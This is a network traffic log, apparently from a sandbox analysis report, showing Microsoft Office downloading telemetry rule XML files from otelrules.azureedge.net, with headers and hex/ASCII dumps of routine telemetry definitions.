2024-11-07 06:32:58 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-07 06:32:58 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49740	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:59 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:32:59 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:32:59 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: bfca7b67-501e-005b-6e78-30d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063259Z-17df447cdb5fzdpxhC1DFWdd3400000003z000000000ae9c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:32:59 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49739	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:59 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:32:59 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:32:59 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063259Z-16547b76f7f775p5hC1DFWzdvn00000007ng00000000kw1s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:32:59 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:59 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:32:59 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:32:59 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: f37a8315-901e-002a-2902-2f7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063259Z-17df447cdb5qt2nfhC1DFWzhgw000000017000000000hydh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:32:59 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49741	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:59 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:32:59 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:32:59 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 23b843a5-001e-0065-686a-2e0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063259Z-15869dbbcc6tfpj2hC1DFW384c00000001b00000000066xa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:32:59 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49738	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:59 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:32:59 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:32:59 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063259Z-16547b76f7f4k79zhC1DFWu9y000000007v0000000006300 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:32:59 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:00 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:00 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063300Z-16547b76f7fm7xw6hC1DFW5px400000007n000000000cdt4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:00 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
